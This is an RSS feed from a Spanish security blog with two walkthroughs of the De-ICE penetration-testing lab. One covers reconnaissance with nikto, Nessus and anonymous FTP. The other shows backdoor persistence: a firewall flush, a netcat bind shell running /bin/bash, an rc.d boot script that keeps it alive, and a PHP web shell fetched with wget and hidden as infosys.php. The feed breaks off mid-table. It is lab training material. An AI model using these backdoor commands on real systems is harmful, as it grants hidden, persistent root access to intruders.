<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sec-Track &#187; Netcat</title>
	<atom:link href="http://www.sec-track.com/tag/netcat/feed" rel="self" type="application/rss+xml" />
	<link>http://www.sec-track.com</link>
	<description></description>
	<lastBuildDate>Wed, 01 Feb 2012 15:08:22 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Desarrollo del Entorno De-Ice nivel II – Recolección de Información / Escaneo de Vulnerabilidades</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-recoleccion-de-informacion-escaneo-de-vulnerabilidades</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-recoleccion-de-informacion-escaneo-de-vulnerabilidades#comments</comments>
		<pubDate>Fri, 22 Jan 2010 05:23:55 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[ISSAF]]></category>
		<category><![CDATA[Nessus]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nikto]]></category>
		<category><![CDATA[OSSTMM]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Vulnerability Scanning]]></category>
		<category><![CDATA[Wget]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=367</guid>
		<description><![CDATA[Ya hemos realizado varios escaneos al sistema y hemos identificado los servicios que se ejecutan en este. Pasemos ahora a recolectar información sensible del sistema o de interés para posibles ataques. Se hace necesario realizar varios tipos de test; entre ellos un escaneo de directorios y archivos (árbol de directorios del aplicativo web), pruebas de [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">
<p style="text-align: justify;">Ya hemos realizado varios escaneos al sistema y hemos identificado los servicios que se ejecutan en este. Pasemos ahora a recolectar información sensible del sistema o de interés para posibles ataques.</p>
<p style="text-align: justify;"><span id="more-367"></span>Se hace necesario realizar varios tipos de test; entre ellos un escaneo de directorios y archivos (árbol de directorios del aplicativo web), pruebas de conexión a los diferentes servicios, etc. Todos estos procedimientos son detallados en las metodologías<a href="http://www.sec-track.com/issaf-information-system-security-assessment-framework" target="_blank"><strong> ISSAF</strong></a> y <a href="http://www.sec-track.com/osstmm-open-source-security-testing-methodology-manual" target="_blank"><strong>OSSTMM</strong></a>.</p>
<p style="text-align: justify;">Si observamos la página web del sistema objetivo, esta nos ofrece información sobre la finalidad del sistema y de las personas/usuarios que administran/utilizan el servidor. Estos son:</p>
<p style="text-align: justify;"><strong>Sr. System Admin:  Adam Adams &#8211; adamsa@herot.net<br />
System Admin (Intern): Bob Banter &#8211; banterb@herot.net<br />
System Admin:  Chad Coffee &#8211; coffeec@herot.net </strong></p>
<p style="text-align: justify;">Muy posiblemente los usuarios válidos en el sistema sean:</p>
<ul style="text-align: justify;">
<li>adamsa</li>
<li>banterb</li>
<li>coffeec</li>
</ul>
<p style="text-align: justify;">Y estos nos sirvan para llevar a cabo un ataque de autenticación a los servicios que actualmente ofrece (FTP, SSH)</p>
<p style="text-align: justify;">Aun así y con el objetivo de recolectar más información realicemos un escaneo de directorios y vulnerabilidades web con la herramienta <a href="http://cirt.net/nikto2" target="_blank"><strong>nikto</strong></a>.</p>
<h3 style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# perl nikto.pl -h http://192.168.1.110</strong></h3>
<p style="text-align: justify;">- Nikto v2.1.0<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Target IP:          192.168.1.110<br />
+ Target Hostname:    192.168.1.110<br />
+ Target Port:        80<br />
+ Start Time:         2010-01-22 20:49:26<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2<br />
+ OSVDB-0: mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2 &#8211; mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.<br />
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE<br />
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST<br />
+ OSVDB-0: Apache/2.2.4 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.<br />
+ OSVDB-0: mod_ssl/2.2.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)<br />
+ OSVDB-0: OpenSSL/0.9.8b appears to be outdated (current is at least 0.9.8i) (may depend on server version)<br />
+ 3588 items checked: 6 item(s) reported on remote host<br />
+ End Time:           2010-01-22 20:50:02 (36 seconds)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ 1 host(s) tested</p>
<p style="text-align: justify;">Pasemos ahora a explorar el código fuente del sitio Web con el objetivo de buscar información oculta. Para ello realizaremos una descarga de todo el Website con la herramienta <a href="http://es.wikipedia.org/wiki/GNU_Wget" target="_blank"><strong>WGet</strong></a>.</p>
<h3 style="text-align: justify;"><strong>root@bt:~/Sec-Track/De-Ice_II# wget -r http://192.168.1.110</strong></h3>
<p style="text-align: justify;">&#8211;2010-01-21 21:02:52&#8211;  http://192.168.1.110/<br />
Connecting to 192.168.1.110:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 2036 (2.0K) [text/html]<br />
Saving to: `192.168.1.110/index.html&#8217;</p>
<p>100%[======================================&gt;] 2,036       &#8211;.-K/s   in 0s</p>
<p>2010-01-21 21:02:52 (103 MB/s) &#8211; `192.168.1.110/index.html&#8217; saved [2036/2036]</p>
<p>Loading robots.txt; please ignore errors.<br />
&#8211;2010-01-21 21:02:52&#8211;  http://192.168.1.110/robots.txt<br />
Reusing existing connection to 192.168.1.110:80.<br />
HTTP request sent, awaiting response&#8230; 404 Not Found<br />
2010-01-21 21:02:52 ERROR 404: Not Found.</p>
<p>&#8211;2010-01-21 21:02:52&#8211;  http://192.168.1.110/level.html<br />
Reusing existing connection to 192.168.1.110:80.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 2309 (2.3K) [text/html]<br />
Saving to: `192.168.1.110/level.html&#8217;</p>
<p>100%[======================================&gt;] 2,309       &#8211;.-K/s   in 0s</p>
<p>2010-01-21 21:02:52 (157 MB/s) &#8211; `192.168.1.110/level.html&#8217; saved [2309/2309]</p>
<p>&#8211;2010-01-21 21:02:52&#8211;  http://192.168.1.110/copyright.txt<br />
Reusing existing connection to 192.168.1.110:80.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 15719 (15K) [text/plain]<br />
Saving to: `192.168.1.110/copyright.txt&#8217;</p>
<p>100%[======================================&gt;] 15,719      &#8211;.-K/s   in 0s</p>
<p>2010-01-21 21:02:52 (177 MB/s) &#8211; `192.168.1.110/copyright.txt&#8217; saved [15719/15719]</p>
<p>&#8211;2010-01-21 21:02:52&#8211;  http://192.168.1.110/index2.html<br />
Reusing existing connection to 192.168.1.110:80.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 847 [text/html]<br />
Saving to: `192.168.1.110/index2.html&#8217;</p>
<p>100%[======================================&gt;] 847         &#8211;.-K/s   in 0.001s</p>
<p>2010-01-21 21:02:52 (968 KB/s) &#8211; `192.168.1.110/index2.html&#8217; saved [847/847]</p>
<p>FINISHED &#8211;2010-01-21 21:02:52&#8211;<br />
Downloaded: 4 files, 20K in 0.001s (20.5 MB/s)</p>
<p style="text-align: justify;">Luego de analizar los archivos descargados pudimos darnos cuenta que no existe ninguna información de relevancia para el Test de Penetración. Lo que si pudimos encontrar fue un archivo (level.html) con información relacionada con el entorno De-Ice LiveCD II:</p>
<p style="text-align: justify;"><em>&lt;B&gt;&lt;I&gt;The disk is considered Level 1&lt;/I&gt;&lt;/B&gt;, and minimal penetration skills are required in order to exploit this disk.  Additional skills required to complete this challenge is a more-than-basic understanding of unix commands and basic functionality of the unix OS.  All tools needed to exploit this disk can be found on the BackTrack Penetration LiveCD (version 2) found at Remote-Exploit.org.  No additional downloads or disks are needed.<br />
&lt;BR&gt;&lt;BR&gt;<br />
&lt;B&gt;Minimum time required to penetrate this CD is:  30 Minutes (approx.)&lt;/B&gt;&lt;BR&gt;<br />
This time is only possible if you know exactly what to do, and in what order.  Do not get frustrated if penetration of this system exceeds hours, or even days.<br />
This exercise is intended to provide a real-world simulation of a penetration test task.  Sometimes, banging your head IS the answer&#8230; so bang away.  &gt;;-)</em></p>
<p style="text-align: justify;">etc&#8230;.</p>
<p style="text-align: justify;">En la fase anterior no pudimos identificar el banner del servicio que se ejecutaba en el puerto 22 (SSH) con nmap, para esto simplemente ejecuto la herramienta <a href="http://www.sec-track.com/tag/netcat" target="_blank"><strong>Netcat</strong></a>:</p>
<h3 style="text-align: justify;"><strong>root@bt:~# nc 192.168.1.110 22</strong></h3>
<p style="text-align: justify;">SSH-1.99-OpenSSH_4.3</p>
<p style="text-align: justify;">Además de esto vamos a realizar un escaneo de vulnerabilidades con la herramienta <a href="http://es.wikipedia.org/wiki/Nessus" target="_blank"><strong>Nessus</strong></a>.</p>
<p style="text-align: justify;">Para ello voy a deshabilitar todos los plugins que vienen activos por defecto, pues solo vamos a requerir algunos que están relacionados con los puertos y servicios que identificamos en la primera fase del Test de Penetración.</p>
<p style="text-align: justify;"><strong>Brute Force Attacks</strong></p>
<ul style="text-align: justify;">
<li>Hydra FTP</li>
<li>Hydra SSH2</li>
</ul>
<p style="text-align: justify;"><strong>FTP</strong></p>
<ul style="text-align: justify;">
<li>Anonymous FTP Enabled</li>
<li>Anonymous FTP Writeable root Directory</li>
<li>FTP Privileged Port Bounce Scan</li>
<li>FTP Server Any Command Accepted (Possible Backdoor Proxy)</li>
<li>FTP Server Bad Command Sequence Accepted (Possible Backdoor Proxy)</li>
<li>FTP Server Copyrighted Material Present</li>
<li>FTP Server No Command Accepted (Possible Backdoor Proxy)</li>
<li>Etc&#8230;</li>
</ul>
<p style="text-align: justify;"><strong>Finger Abuses</strong></p>
<ul style="text-align: justify;">
<li>Finger .@host Unused Account Disclosure</li>
<li>Finger 0@host Unused Account Disclosure</li>
<li>Finger Service Remote Information Disclosure</li>
<li>Etc&#8230;</li>
</ul>
<p style="text-align: justify;"><strong>General</strong></p>
<ul style="text-align: justify;">
<li>Enumerate</li>
<li>OS Identification</li>
<li>OS Identification FTP</li>
<li>OS Identification HTTP</li>
<li>OS Identification ICMP</li>
<li>OS Identification Linux Distribution</li>
<li>OS Identification SSH</li>
</ul>
<p style="text-align: justify;"><strong>Web Servers</strong></p>
<ul style="text-align: justify;">
<li>Apache</li>
<li>PHP</li>
<li>Etc&#8230;</li>
</ul>
<p style="text-align: justify;"><strong>Gain a Shell Remotely</strong></p>
<ul style="text-align: justify;">
<li>OpenSSH</li>
<li>OpenSSL</li>
<li>Shell Command Execution Vulnerability</li>
<li>Etc&#8230;</li>
</ul>
<p style="text-align: justify;">Entre otras&#8230;</p>
<p style="text-align: justify;">Como vemos este escaneo está configurado de manera muy general, y enfocado únicamente a los servicios  encontrados con Nmap. Por ello solo encontramos las siguientes Alertas de Seguridad en el resultado de Nessus.</p>
<p style="text-align: justify;">﻿﻿﻿<strong>Nessus Report</strong><br />
The Nessus Security Scanner was used to assess the security of 1 host</p>
<ul style="text-align: justify;">
<li> 2 security warnings have been found</li>
<li> 1 security note has been found</li>
</ul>
<p style="text-align: justify;"><strong>List of open ports :</strong></p>
<ul style="text-align: justify;">
<li>ssh (22/tcp)</li>
<li>ipp (631/tcp)</li>
<li>http (80/tcp)</li>
<li><strong>ftp (21/tcp)  (Security warnings found</strong></li>
</ul>
<p style="text-align: justify;"><strong>Warning found on port ftp (21/tcp)</strong><br />
<strong> Synopsis :</strong></p>
<p>Anonymous logins are allowed on the remote FTP server.<br />
<strong>Description :</strong></p>
<p style="text-align: justify;">This FTP service allows anonymous logins. Any remote user may connect and authenticate without providing a password or unique credentials. This allows a user to access any files made available on the FTP server.</p>
<p><strong> Solution :</strong></p>
<p style="text-align: justify;">Disable anonymous FTP if it is not required. Routinely check the FTP server to ensure sensitive content is not available.</p>
<p><strong> Risk factor :</strong></p>
<p>Medium / CVSS Base Score : 5.0<br />
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)</p>
<p>CVE : CVE-1999-0497<br />
Other references : OSVDB:69<br />
Nessus ID : 10079</p>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p style="text-align: justify;"><strong>Warning found on port ftp (21/tcp)</strong><br />
<strong> Synopsis :</strong></p>
<p>The remote FTP server contains world-writable directories.</p>
<p><strong> Description :</strong></p>
<p style="text-align: justify;">By crawling through the remote FTP server, Nessus discovered several directories were marked as being world-writable.</p>
<p>This could have several negative impacts:</p>
<p style="text-align: justify;">* Temporary file uploads are sometimes immediately available to all anonymous users, allowing the FTP server to be used as a &#8216;drop&#8217; point. This may faciliate trading copyrighted, pornographic or questionable material.</p>
<p style="text-align: justify;">* A user may be able to upload large files that consume disk space, resulting in a denial of service condition.</p>
<p style="text-align: justify;">* A user can upload a malicious program. If an administrator routinely checks the &#8216;incoming&#8217; directory, they may load a document or run a program that exploits a vulnerability in client software.</p>
<p><strong> Solution :</strong></p>
<p>Configure the remote FTP directories so that they are not world-writable.</p>
<p><strong> Risk factor :</strong></p>
<p>Medium / CVSS Base Score : 6.4<br />
(CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P)</p>
<p>Other references : OSVDB:76<br />
Nessus ID : 19782</p>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p style="text-align: justify;"><strong>Information found on port ftp (21/tcp)</strong><br />
<strong> Synopsis :</strong></p>
<p>The remote FTP server allows credentials to be transmitted in clear text.</p>
<p><strong> Description :</strong></p>
<p style="text-align: justify;">The remote FTP does not encrypt its data and control connections. The user name and password are transmitted in clear text and may be intercepted by a network sniffer, or a man-in-the-middle attack.</p>
<p><strong> Solution :</strong></p>
<p style="text-align: justify;">Switch to SFTP (part of the SSH suite) or FTPS (FTP over SSL/TLS). In the latter case, configure the server such as data and control connections must be encrypted.</p>
<p><strong> Risk factor :</strong></p>
<p>Low / CVSS Base Score : 2.6<br />
(CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)</p>
<p style="text-align: justify;">Nessus ID : 34324)</p>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p style="text-align: justify;">Finalmente comprobamos manualmente este acceso al servidor FTP que permite login anónimo.</p>
<h3><strong>root@bt:~/Sec-Track/De-Ice_II/192.168.1.110# ftp 192.168.1.110</strong></h3>
<p style="text-align: justify;">Connected to 192.168.1.110.<br />
220 (vsFTPd 2.0.4)<br />
Name (192.168.1.110:root): anonymous<br />
331 Please specify the password.<br />
Password:<br />
230 Login successful.<br />
Remote system type is UNIX.<br />
Using binary mode to transfer files.<br />
ftp&gt;</p>
<p style="text-align: justify;">En la próxima fase (post) llevaremos a cabo una primera exploración dentro del servidor FTP en busca de información sensible que nos permita elevar privilegios en el sistema objetivo. En caso de no encontrar nada relevante procederemos a intentar un login por medio del servidor SSH.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-recoleccion-de-informacion-escaneo-de-vulnerabilidades/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Entorno De-Ice nivel I – Backdoors, Manteniendo el Acceso</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-backdoors-manteniendo-el-acceso</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-backdoors-manteniendo-el-acceso#comments</comments>
		<pubDate>Thu, 10 Dec 2009 06:53:00 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Backdoor]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[IPTABLES]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Shell PHP]]></category>
		<category><![CDATA[Wget]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=281</guid>
		<description><![CDATA[Ahora que hemos conseguido elevar privilegios y acceder a la información crítica contenida en el sistema objetivo, veamos algunos métodos para mantener el acceso al sistema. Sobra aclarar que toda la información publicada es de carácter educativo, y solo busca recrear de la mejor manera los ataques a los que están expuestos los sistemas y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Ahora que hemos conseguido elevar privilegios y acceder a la información crítica contenida en el sistema objetivo, veamos algunos métodos para mantener el acceso al sistema. Sobra aclarar que toda la información publicada es de carácter educativo, y solo busca recrear de la mejor manera los ataques a los que están expuestos los sistemas y sus administradores y oficiales de seguridad. Todo ello con la finalidad de adquirir destrezas y habilidades en los temas relacionados con los Test de Penetración.</p>
<p style="text-align: justify;"><span id="more-281"></span>La finalidad de usar sistemas backdoors (puertas traseras) es mantener un acceso al sistema de manera oculta al administrador del sistema, los cuales permitirán una entrada luego de un reinicio del sistema o ciertas condiciones a la que se someta el sistema sin necesidad de penetrar nuevamente el sistema.</p>
<p style="text-align: justify;">El tema de backdoors en sistemas es más un arte que una técnica, ya que esta obliga al PenTester a usar toda su creatividad e imaginación para lograr su objetivo de conseguir un acceso en cualquier momento al sistema sin ser descubierto.</p>
<p style="text-align: justify;">Solo mostraré algunos métodos para crear puertas traseras con la herramienta Netcat y otro con el servicio de publicación en Web (PHP), con la finalidad de que los lectores se animen y publiquen los métodos que conozcan y nos vayamos preparando para los entornos que vienen.</p>
<p style="text-align: justify;">Ya hemos hablado anteriormente de Netcat (<a title="Permanent Link to Video Tutorial Netcat en BackTrack" rel="bookmark" href="../video-tutorial-netcat-en-backtrack">Video Tutorial Netcat en BackTrack</a>), ahora aprovechemos el entorno disponible para practicar los aprendido.</p>
<p style="text-align: justify;">Para nuestra fortuna, en el entorno De-Ice I netcat se encuentra disponible en dicho sistema, por lo tanto solo necesitamos dejarlo a la escucha.</p>
<p style="text-align: justify;">Antes de ello es necesario verificar como se encuentra configurado el sistema de IPTABLES con la finalidad de analizar como se realizan las conexiones al sistema (conexiones permitidas, conexiones denegadas, etc)</p>
<p style="text-align: justify;"><em><strong>root@slax:/# iptables -L</strong></em><br />
Chain INPUT (policy ACCEPT)<br />
target     prot opt source               destination<br />
ACCEPT     all  &#8211;  anywhere             anywhere<br />
ACCEPT     udp  &#8211;  anywhere             anywhere            udp dpt:domain<br />
ACCEPT     udp  &#8211;  anywhere             anywhere            udp spt:domain<br />
ACCEPT     all  &#8211;  anywhere             anywhere            state RELATED,ESTAB                                              LISHED<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:ftp-data<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:ftp<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:ssh<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:smtp<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:http<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:pop3<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:imap<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:https<br />
LOG_DROP   all  &#8211;  anywhere             anywhere</p>
<p>Chain FORWARD (policy ACCEPT)<br />
target     prot opt source               destination<br />
LOG_DROP   all  &#8211;  anywhere             anywhere</p>
<p>Chain OUTPUT (policy ACCEPT)<br />
target     prot opt source               destination<br />
ACCEPT     all  &#8211;  anywhere             anywhere</p>
<p>Chain LOG_DROP (2 references)<br />
target     prot opt source               destination<br />
DROP       all  &#8211;  anywhere             anywhere</p>
<p style="text-align: justify;">Si quisieramos tirar abajo todas las reglas (no recomendado para el objetivo de pasar desapercibido) solo basta con ejecutar la siguiente instrucción.</p>
<p style="text-align: justify;"><em><strong>root@slax:/# iptables -F</strong></em></p>
<p style="text-align: justify;">La idea es que los lectores propongan una de las muchas maneras de agregar esta conexión a las reglas de IPTABLES sin tirar las demás abajo (<a href="http://es.wikipedia.org/wiki/Netfilter/iptables" target="_blank">Más información sobre IPTABLES y su configuración/edición</a>)</p>
<p style="text-align: justify;">Luego de esta &#8220;limpieza&#8221; de reglas vemos como quitamos la negación a peticiones ICMP que observamos al comienzo de la prueba.</p>
<p style="text-align: justify;"><em><strong>S3cTr4cK@0100100-0100100 ~<br />
$ ping 192.168.1.100</strong></em></p>
<p>Pinging 192.168.1.100 with 32 bytes of data:</p>
<p>Reply from 192.168.1.100: bytes=32 time=1ms TTL=64<br />
Reply from 192.168.1.100: bytes=32 time=1ms TTL=64</p>
<p>Ping statistics for 192.168.1.100:<br />
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),<br />
Approximate round trip times in milli-seconds:<br />
Minimum = 1ms, Maximum = 1ms, Average = 1ms</p>
<p style="text-align: justify;">Ahora ejecutemos a netcat en modo escucha en el sistema objetivo (De-Ice I)</p>
<p style="text-align: justify;"><em><strong>root@slax:/# nc -l -p 1337 -e /bin/bash</strong></em></p>
<p style="text-align: justify;">Si realizaramos un escaneo sencillo con nmap a varios puertos incluyendo el que dejamos a la escucha, encontraríamos los siguientes:</p>
<p style="text-align: justify;"><em><strong>C:\Program Files\Nmap&gt;nmap -p 22,25,80,443,1337 192.168.1.100</strong></em></p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-09 23:51 SA Pacific Standard T<br />
Interesting ports on 192.168.1.100:<br />
PORT     STATE  SERVICE<br />
22/tcp   open   ssh<br />
25/tcp   open   smtp<br />
80/tcp   open   http<br />
443/tcp  closed https<br />
<strong>1337/tcp open   waste</strong><br />
MAC Address: 00:1A:73:90:81:0B (Gemtek Technology Co.)</p>
<p>Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds</p>
<p style="text-align: justify;">Ahora desde nuestro sistema cliente (atacante) solo basta conectarnos al puerto que dejamos a la escucha (1337) y ejecutar algunos comandos:</p>
<p style="text-align: justify;"><em><strong>C:\Documents and Settings\S3cTr4cK\My Documents\Descargas\nc&gt;nc 192.168.1.100 1337<br />
whoami</strong></em><br />
root<br />
<em><strong>pwd</strong></em><br />
/<br />
<em><strong>ifconfig</strong></em><br />
eth0      Link encap:Ethernet  HWaddr 00:0C:29:43:03:6B<br />
inet addr:192.168.1.100  Bcast:192.168.1.255  Mask:255.255.255.0<br />
inet6 addr: fe80::20c:29ff:fe43:36b/64 Scope:Link<br />
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1<br />
RX packets:6377 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:1365 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 txqueuelen:1000<br />
RX bytes:438725 (428.4 KiB)  TX bytes:169876 (165.8 KiB)<br />
Interrupt:5 Base address:0&#215;2000</p>
<p>lo        Link encap:Local Loopback<br />
inet addr:127.0.0.1  Mask:255.0.0.0<br />
inet6 addr: ::1/128 Scope:Host<br />
UP LOOPBACK RUNNING  MTU:16436  Metric:1<br />
RX packets:176 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:176 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 txqueuelen:0<br />
RX bytes:15878 (15.5 KiB)  TX bytes:15878 (15.5 KiB)</p>
<p><em><strong>uname -a</strong></em><br />
Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 athlon-4 i386 GNU/Linux</p>
<p style="text-align: justify;">Ahora bien&#8230; ¿Qué pasaría si quisieramos que dicha instrucción se ejecutara al inicio del sistema objetivo?</p>
<p style="text-align: justify;">Solo basta automatizar dicho inicio alojando la instrucción (script) en el directorio <strong>/etc/rc.d</strong></p>
<p style="text-align: justify;">Veamos el contenido de este directorio y un ejemplo de script para dicho propósito:</p>
<p style="text-align: justify;"><strong>Contenido:</strong></p>
<p style="text-align: justify;"><em><strong>root@slax:/etc/rc.d# ls</strong></em><br />
rc.0         rc.alsa      rc.inet1       rc.nfsd        rc.sshd<br />
rc.4         rc.bind      rc.inet1.conf  rc.pcmcia      rc.syslog<br />
rc.6         rc.cups      rc.inet2       rc.portmap     rc.sysvinit<br />
rc.FireWall  rc.firewall  rc.inetd       rc.saslauthd   rc.udev<br />
rc.K         rc.font.new  rc.ip_forward  rc.sendmail    rc.vsftpd<br />
rc.M         rc.gpm       rc.local       rc.serial      rc.wireless<br />
rc.S         rc.hotplug   rc.modules     rc.slax        rc.wireless.conf<br />
rc.acpid     rc.httpd     rc.mysqld      rc.slaxconfig</p>
<p style="text-align: justify;">Hagamos entonces lo mismo para Netcat</p>
<p style="text-align: justify;"><strong>Script:</strong></p>
<p style="text-align: justify;"><em><strong>root@slax:/etc/rc.d# vi rc.netcat1</strong></em><br />
#!/bin/sh<br />
mkdir /tmp/netcat<br />
while true ; do<br />
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash<br />
done</p>
<p style="text-align: justify;">Y quedaría así:</p>
<p style="text-align: justify;"><em><strong>root@slax:/etc/rc.d# more rc.netcat1</strong></em><br />
#!/bin/sh<br />
mkdir /tmp/netcat<br />
while true ; do<br />
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash<br />
done</p>
<p style="text-align: justify;">Otra buena opción sería utilizar a Netcat en modo reverse shell, que también ha sido tratado en el video tutorial citado anteriormente.</p>
<p style="text-align: justify;">El tercer método para habilitar una puerta tracera en el sistema de manera más &#8220;discreta&#8221; puede ser el uso del servidor web en la máquina objetivo, veamos:</p>
<p style="text-align: justify;">Para ello haremos uso de una shell en el leguaje del lado del servidor PHP.</p>
<p style="text-align: justify;">Primero debemos descargarla y transferirla a la máquina objetivo.</p>
<p style="text-align: justify;">Para la transferencia he habilitado un server en mi máquina, solo basta realizar la petición con wget:</p>
<p style="text-align: justify;"><em><strong>root@slax:~/Desktop# wget http://192.168.1.3/shellphp.txt</strong></em><br />
&#8211;00:34:53&#8211;  http://192.168.1.3/shellphp.txt<br />
=&gt; `shellphp.txt&#8217;<br />
Connecting to 192.168.1.3:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 63,743 (62K) [text/plain]</p>
<p>100%[====================================&gt;] 63,743        &#8211;.&#8211;K/s</p>
<p>00:34:53 (64.06 MB/s) &#8211; `shellphp.txt&#8217; saved [63743/63743]</p>
<p><em><strong>root@slax:~/Desktop# ls</strong></em><br />
Home.desktop  System.desktop  shellphp.txt</p>
<p style="text-align: justify;">root@slax:~/Desktop# cp shellphp.txt /var/www/htdocs/infosys.php</p>
<p style="text-align: justify;">Luego solo bastaría con ingresar en cualquier momento a dicha URL, para mi caso:</p>
<p style="text-align: justify;"><em><strong>http://192.168.1.100/infosys.php</strong></em></p>
<table id="table1" style="border: 1px none #333333; height: 90px;" border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="300" height="30" align="left"><strong><span style="font-size: x-small;">File / Folder Name</span></strong></td>
<td width="82" height="28" align="center">#                 <span style="color: #000080; font-size: x-small;"><strong>Size KByte</strong></span></td>
<td width="83" height="28" align="center">#                 <span style="color: #006600; font-size: x-small;"><strong>Download</strong></span></td>
<td width="66" height="28" align="center">#                 <span style="color: #ff9933; font-size: x-small;"><strong>Edit</strong></span></td>
